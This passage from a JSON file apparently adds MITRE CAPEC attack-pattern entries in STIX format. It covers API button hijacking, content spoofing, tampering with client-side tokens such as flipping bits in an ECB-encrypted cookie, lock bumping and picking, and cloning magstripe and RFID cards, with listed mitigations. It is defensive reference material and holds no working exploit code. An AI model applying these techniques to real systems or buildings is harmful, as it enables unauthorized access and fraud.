"cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18", + "external_id": "REF-327", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--9c41b3f7-76fa-4864-9b1d-304327dcd55c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Application API Button Hijacking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9df3addd-7bea-44e5-be63-4cc46d64fbea" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n An in-game event occurs and the attacker traps the result, which turns out to be a form that will be populated to their primary profile. The attacker, using a MITM proxy, observes the following data:\n [Button][Claim_Item]Sourdough_Cookie[URL_IMG]foo[/URL_IMG][Claim_Link]bar[/Claim_Link]\n By altering the destination of \"Claim_Link\" to point to the attackers' server an unwitting victim can be enticed to click the link. Another example would be for the attacker to rewrite the button destinations for an event so that clicking \"Yes\" or \"No\" causes the user to load the attackers' code.\n " + ], + "x_capec_prerequisites": [ + "Targeted software is utilizing application framework APIs" + ], + "x_capec_resources_required": [ + "A software program that allows the use of adversary-in-the-middle (CAPEC-94) communications between the client and server, such as a adversary-in-the-middle (CAPEC-94) proxy." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker manipulates either egress or ingress data from a client within an application framework in order to change the content of messages. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that look authentic but may contain deceptive links, spam-like content, or links to the attackers' code. In general, content-spoofing within an application API can be employed to stage many different types of attacks varied based on the attackers' intent. The techniques require use of specialized software that allow the attacker to use adversary-in-the-middle (CAPEC-94) communications between the web browser and the remote system.", + "external_references": [ + { + "external_id": "CAPEC-389", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/389.html" + }, + { + "external_id": "CWE-353", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/353.html" + }, + { + "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18", + "external_id": "REF-327", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--33370ee8-a290-42cc-b85d-5fd13f1f6fed", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Content Spoofing Via Application API Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ea07b1ea-c1b0-4923-8d25-a8fc39da040a" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "Targeted software is utilizing application framework APIs" + ], + "x_capec_resources_required": [ + "A software program that allows the use of adversary-in-the-middle communications between the client and server, such as an adversary-in-the-middle proxy." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In circumstances where an application holds important data client-side in tokens (cookies, URLs, data files, and so forth) that data can be manipulated. If client or server-side application components reinterpret that data as authentication tokens or data (such as store item pricing or wallet information) then even opaquely manipulating that data may bear fruit for an Attacker. In this pattern an attacker undermines the assumption that client side tokens have been adequately protected from tampering through use of encryption or obfuscation.", + "external_references": [ + { + "external_id": "CAPEC-39", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/39.html" + }, + { + "external_id": "CWE-353", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/353.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html" + }, + { + "external_id": "CWE-472", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/472.html" + }, + { + "external_id": "CWE-565", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/565.html" + }, + { + "external_id": "CWE-315", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/315.html" + }, + { + "external_id": "CWE-539", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/539.html" + }, + { + "external_id": "CWE-384", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/384.html" + }, + { + "external_id": "CWE-233", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/233.html" + } + ], + "id": "attack-pattern--9afead03-280c-4f2c-82f6-b08b7a54a8e3", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Manipulating Opaque Client-based Data Tokens", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "With certain price watching websites, that aggregate products available prices, the user can buy items through whichever vendors has product availability, the best price, or other differentiator. Once a user selects an item, the site must broker the purchase of that item with the vendor. Because vendors sell the same product through different channel partners at different prices, token exchange between price watching sites and selling vendors will often contain pricing information. With some price watching sites, manipulating URL-data (which is encrypted) even opaquely yields different prices charged by the fulfilling vendor. If the manipulated price turns out higher, the Attacker can cancel purchase. If the Attacker succeeded in manipulating the token and creating a lower price, they proceed.", + "Upon successful authentication user is granted an encrypted authentication cookie by the server and it is stored on the client. One piece of information stored in the authentication cookie reflects the access level of the user (e.g. \"u\" for user). The authentication cookie is encrypted using the Electronic Code Book (ECB) mode, that naively encrypts each of the plaintext blocks to each of the ciphertext blocks separately. An attacker knows the structure of the cookie and can figure out what bits (encrypted) store the information relating to the access level of the user. An attacker modifies the authentication cookie and effectively substitutes \"u\" for \"a\" by flipping some of the corresponding bits of ciphertext (trial and error). Once the correct \"flip\" is found, when the system is accessed, the attacker is granted administrative privileges in the system. Note that in this case an attacker did not have to figure out the exact encryption algorithm or find the secret key, but merely exploit the weakness inherent in using the ECB encryption mode.", + "Archangel Weblog 0.90.02 allows remote attackers to bypass authentication by setting the ba_admin cookie to 1. See also: CVE-2006-0944" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Enumerate information passed to client side: The attacker identifies the parameters used as part of tokens to take business or security decisions

    2. Techniques
    Use WebScarab to reveal hidden fields while browsing.
    Use a sniffer to capture packets
    View source of web page to find hidden fields
    Examine URL to see if any opaque tokens are in it
    Disassemble or decompile client-side application
    Use debugging tools such as File Monitor, Registry Monitor, Debuggers, etc.

  2. Determine protection mechanism for opaque token: The attacker determines the protection mechanism used to protect the confidentiality and integrity of these data tokens. They may be obfuscated or a full blown encryption may be used.

    3. Techniques
    Look for signs of well-known character encodings
    Look for cryptographic signatures
    Look for delimiters or other indicators of structure

Experiment

  1. Modify parameter/token values: Trying each parameter in turn, the attacker modifies the values

    2. Techniques
    Modify tokens logically
    Modify tokens arithmetically
    Modify tokens bitwise
    Modify structural components of tokens
    Modify order of parameters/tokens

  2. Cycle through values for each parameter.: Depending on the nature of the application, the attacker now cycles through values of each parameter and observes the effects of this modification in the data returned by the server

    3. Techniques
    Use network-level packet injection tools such as netcat
    Use application-level data modification tools such as Tamper Data, WebScarab, TamperIE, etc.
    Use modified client (modified by reverse engineering)
    Use debugging tools to modify data in client
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--cddb7bce-8d94-4eea-8e73-9f6ef66376c2" + ], + "x_capec_prerequisites": [ + "An attacker already has some access to the system or can steal the client based data tokens from another user who has access to the system.", + "For an Attacker to viably execute this attack, some data (later interpreted by the application) must be held client-side in a way that can be manipulated without detection. This means that the data or tokens are not CRCd as part of their value or through a separate meta-data store elsewhere." + ], + "x_capec_resources_required": [ + "The Attacker needs no special hardware-based resources in order to conduct this attack. Software plugins, such as Tamper Data for Firefox, may help in manipulating URL- or cookie-based data." + ], + "x_capec_skills_required": { + "High": "If the client site token is encrypted.", + "Medium": "If the client site token is obfuscated." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "One solution to this problem is to protect encrypted data with a CRC of some sort. If knowing who last manipulated the data is important, then using a cryptographic \"message authentication code\" (or hMAC) is prescribed. However, this guidance is not a panacea. In particular, any value created by (and therefore encrypted by) the client, which itself is a \"malicious\" value, all the protective cryptography in the world can't make the value 'correct' again. Put simply, if the client has control over the whole process of generating and encoding the value, then simply protecting its integrity doesn't help.", + "id": "course-of-action--e9607fbe-044b-4d09-8ead-802f3f085108", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-39-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--67d47bb8-367b-4568-834c-70ed30ce08cc", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9607fbe-044b-4d09-8ead-802f3f085108", + "spec_version": "2.1", + "target_ref": "attack-pattern--9afead03-280c-4f2c-82f6-b08b7a54a8e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure to protect client side authentication tokens for confidentiality (encryption) and integrity (signed hash)", + "id": "course-of-action--c9f9e9db-5633-4696-b4dc-e6082a1ccb15", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-39-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b6318059-55e6-4b00-9821-0eae3425f8df", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c9f9e9db-5633-4696-b4dc-e6082a1ccb15", + "spec_version": "2.1", + "target_ref": "attack-pattern--9afead03-280c-4f2c-82f6-b08b7a54a8e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure that all session tokens use a good source of randomness", + "id": "course-of-action--08eae113-ec2a-445c-afca-ffe3b526e605", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-39-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--38c91dac-0db3-40f7-ab37-2d092382b5ca", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--08eae113-ec2a-445c-afca-ffe3b526e605", + "spec_version": "2.1", + "target_ref": "attack-pattern--9afead03-280c-4f2c-82f6-b08b7a54a8e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Perform validation on the server side to make sure that client side data tokens are consistent with what is expected.", + "id": "course-of-action--85ac4180-1e64-45ea-a569-f9e826426ae8", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-39-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2f0a0801-67e1-4043-87bf-b630a49aa8a8", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--85ac4180-1e64-45ea-a569-f9e826426ae8", + "spec_version": "2.1", + "target_ref": "attack-pattern--9afead03-280c-4f2c-82f6-b08b7a54a8e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Facilities often used layered models for physical security such as traditional locks, Electronic-based card entry systems, coupled with physical alarms. Hardware security mechanisms range from the use of computer case and cable locks as well as RFID tags for tracking computer assets. This layered approach makes it difficult for random physical security breaches to go unnoticed, but is less effective at stopping deliberate and carefully planned break-ins. Avoiding detection begins with evading building security and surveillance and methods for bypassing the electronic or physical locks which secure entry points.", + "external_references": [ + { + "external_id": "CAPEC-390", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/390.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--8ba08815-66fb-4150-a7fa-8ab6d1472b5f", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Bypassing Physical Security", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--00c93895-c68e-4d27-a1ec-0dddce68ed97", + "attack-pattern--5e808864-44b1-478c-8cb0-75c55cd51e2b" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker uses techniques and methods to bypass physical security measures of a building or facility. Physical locks may range from traditional lock and key mechanisms, cable locks used to secure laptops or servers, locks on server cases, or other such devices. Techniques such as lock bumping, lock forcing via snap guns, or lock picking can be employed to bypass those locks and gain access to the facilities or devices they protect, although stealth, evidence of tampering, and the integrity of the lock following an attack, are considerations that may determine the method employed. Physical locks are limited by the complexity of the locking mechanism. While some locks may offer protections such as shock resistant foam to prevent bumping or lock forcing methods, many commonly employed locks offer no such countermeasures.", + "external_references": [ + { + "external_id": "CAPEC-391", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/391.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--00c93895-c68e-4d27-a1ec-0dddce68ed97", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Bypassing Physical Locks", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--8ba08815-66fb-4150-a7fa-8ab6d1472b5f" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--4068bee0-b331-49e8-872e-98429a3c374a", + "attack-pattern--9996317e-313b-456c-8bc8-491dbb53b368", + "attack-pattern--aea87f07-9619-4bc5-9790-01bf3423c494" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker uses a bump key to force a lock on a building or facility and gain entry. Lock Bumping is the use of a special type of key that can be tapped or bumped to cause the pins within the lock to fall into temporary alignment, allowing the lock to be opened. Lock bumping allows an attacker to open a lock without having the correct key. A standard lock is secured by a set of internal pins that prevent the device from turning. Spring loaded driver pins push down on the key pins. When the correct key is inserted, the ridges on the key push the key pins up and against the driver pins, causing correct alignment which allows the lock cylinder to rotate. A bump key is a specially constructed key that exploits this design. When the bump key is struck or firmly tapped, its teeth transfer the force of the tap into the key pins, causing the lock to momentarily shift into proper alignment for the mechanism to be opened.", + "external_references": [ + { + "external_id": "CAPEC-392", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/392.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--4068bee0-b331-49e8-872e-98429a3c374a", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Lock Bumping", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--00c93895-c68e-4d27-a1ec-0dddce68ed97" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker uses lock picking tools and techniques to bypass the locks on a building or facility. Lock picking is the use of a special set of tools to manipulate the pins within a lock. Different sets of tools are required for each type of lock. Lock picking attacks have the advantage of being non-invasive in that if performed correctly the lock will not be damaged. A standard lock pin-and-tumbler lock is secured by a set of internal pins that prevent the tumbler device from turning. Spring loaded driver pins push down on the key pins preventing rotation so that the bolt remains in a locked position.. When the correct key is inserted, the ridges on the key push the key pins up and against the driver pins, causing correct alignment which allows the lock cylinder to rotate. Most common locks, such as domestic locks in the US, can be picked using a standard 2 tools (i.e. a torsion wrench and a hook pick).", + "external_references": [ + { + "external_id": "CAPEC-393", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/393.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--9996317e-313b-456c-8bc8-491dbb53b368", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Lock Picking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--00c93895-c68e-4d27-a1ec-0dddce68ed97" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker uses a Snap Gun, also known as a Pick Gun, to force the lock on a building or facility. A Pick Gun is a special type of lock picking instrument that works on similar principles as lock bumping. A snap gun is a hand-held device with an attached metal pick. The metal pick strikes the pins within the lock, transferring motion from the key pins to the driver pins and forcing the lock into momentary alignment. A standard lock is secured by a set of internal pins that prevent the device from turning. Spring loaded driver pins push down on the key pins. When the correct key is inserted, the ridges on the key push the key pins up and against the driver pins, causing correct alignment which allows the lock cylinder to rotate. A Snap Gun exploits this design by using a metal pin to strike all of the key pins at once, forcing the driver pins to shift into an unlocked position. Unlike bump keys or lock picks, a Snap Gun may damage the lock more easily, leaving evidence that the lock has been tampered with.", + "external_references": [ + { + "external_id": "CAPEC-394", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/394.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--aea87f07-9619-4bc5-9790-01bf3423c494", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Using a Snap Gun Lock to Force a Lock", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--00c93895-c68e-4d27-a1ec-0dddce68ed97" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker exploits security assumptions to bypass electronic locks or other forms of access controls. Most attacks against electronic access controls follow similar methods but utilize different tools. Some electronic locks utilize magnetic strip cards, others employ RFID tags embedded within a card or badge, or may involve more sophisticated protections such as voice-print, thumb-print, or retinal biometrics. Magnetic Strip and RFID technologies are the most widespread because they are cost effective to deploy and more easily integrated with other electronic security measures. These technologies share common weaknesses that an attacker can exploit to gain access to a facility protected by the mechanisms via copying legitimate cards or badges, or generating new cards using reverse-engineered algorithms.", + "external_references": [ + { + "external_id": "CAPEC-395", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/395.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--5e808864-44b1-478c-8cb0-75c55cd51e2b", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Bypassing Electronic Locks and Access Controls", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--8ba08815-66fb-4150-a7fa-8ab6d1472b5f" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--19015961-475c-438b-887b-e3d66a9143de", + "attack-pattern--65737f80-588a-449a-af08-0508486d9481", + "attack-pattern--ca237733-be3e-4d9c-85a0-d18cb1c8295d", + "attack-pattern--309b5fec-8a59-4d28-8a1c-427d289aad93", + "attack-pattern--0fda524b-2218-4aec-bf3e-6f345d13e459" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it a generalization of CAPEC-397: Cloning Magnetic Strip Cards, CAPEC-398: Magnetic Strip Card Brute Force Attacks, CAPEC-399: Cloning RFID Cards or Chips and CAPEC-400: RFID Chip Deactivation or Destruction. Please refer to these CAPECs going forward.", + "external_references": [ + { + "external_id": "CAPEC-396", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/396.html" + } + ], + "id": "attack-pattern--631dcf7a-d23f-45b3-b72a-ebd5a3625aeb", + "modified": "2019-09-30T00:00:00.000Z", + "name": "DEPRECATED: Bypassing Card or Badge-Based Systems", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker duplicates the data on a Magnetic strip card (i.e. 'swipe card' or 'magstripe') to gain unauthorized access to a physical location or a person's private information. Magstripe cards encode data on a band of iron-based magnetic particles arrayed in a stripe along a rectangular card. Most magstripe card data formats conform to ISO standards 7810, 7811, 7813, 8583, and 4909. The primary advantage of magstripe technology is ease of encoding and portability, but this also renders magnetic strip cards susceptible to unauthorized duplication. If magstripe cards are used for access control, all an attacker need do is obtain a valid card long enough to make a copy of the card and then return the card to its location (i.e. a co-worker's desk). Magstripe reader/writers are widely available as well as software for analyzing data encoded on the cards. By swiping a valid card, it becomes trivial to make any number of duplicates that function as the original.", + "external_references": [ + { + "external_id": "CAPEC-397", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/397.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--19015961-475c-438b-887b-e3d66a9143de", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Cloning Magnetic Strip Cards", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--5e808864-44b1-478c-8cb0-75c55cd51e2b" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary analyzes the data on two or more magnetic strip cards and is able to generate new cards containing valid sequences that allow unauthorized access and/or impersonation of individuals.", + "external_references": [ + { + "external_id": "CAPEC-398", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/398.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--65737f80-588a-449a-af08-0508486d9481", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Magnetic Strip Card Brute Force Attacks", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--5e808864-44b1-478c-8cb0-75c55cd51e2b" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_extended_description": "\n Often, magnetic strip encoding methods follow a common format for a given system laid out in up to three tracks. A single card may allow access to a corporate office complex shared by multiple companies. By analyzing how the data is stored on a card, it is also possible to create valid cards via brute-force attacks.\n For example, a single card can grant access to a building, a floor, and a suite number. Reading and analyzing data on multiple cards, then performing a difference analysis between data encoded on three different cards, can reveal clues as to how to generate valid cards that grant access to restricted areas of a building or suites/rooms within that building. Data stored on magstripe cards is often unencrypted, therefore comparing which data changes when two or more cards are analyzed can yield results that aid in determining the structure of the card data. A trivial example would be a common system data format on a data track which binary encodes the suite number of a building that a card will open. By creating multiple cards with differing binary encoded segments it becomes possible to enter unauthorized areas or pass through checkpoints giving the electronic ID of other persons.\n ", + "x_capec_prerequisites": [ + "The ability to calculate a card checksum and write out a valid checksum value. Some cards are protected by a checksum calculation, therefore it is necessary to determine what algorithm is being used to calculate the checksum and to employ that algorithm to calculate and write a new valid checksum for the card being created." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker analyzes data returned by an RFID chip and uses this information to duplicate a RFID signal that responds identically to the target chip. In some cases RFID chips are used for building access control, employee identification, or as markers on products being delivered along a supply chain. Some organizations also embed RFID tags inside computer assets to trigger alarms if they are removed from particular rooms, zones, or buildings. Similar to Magnetic strip cards, RFID cards are susceptible to duplication (cloning) and reuse.", + "external_references": [ + { + "external_id": "CAPEC-399", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/399.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--ca237733-be3e-4d9c-85a0-d18cb1c8295d", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Cloning RFID Cards or Chips", + "object_marking_refs": [ + 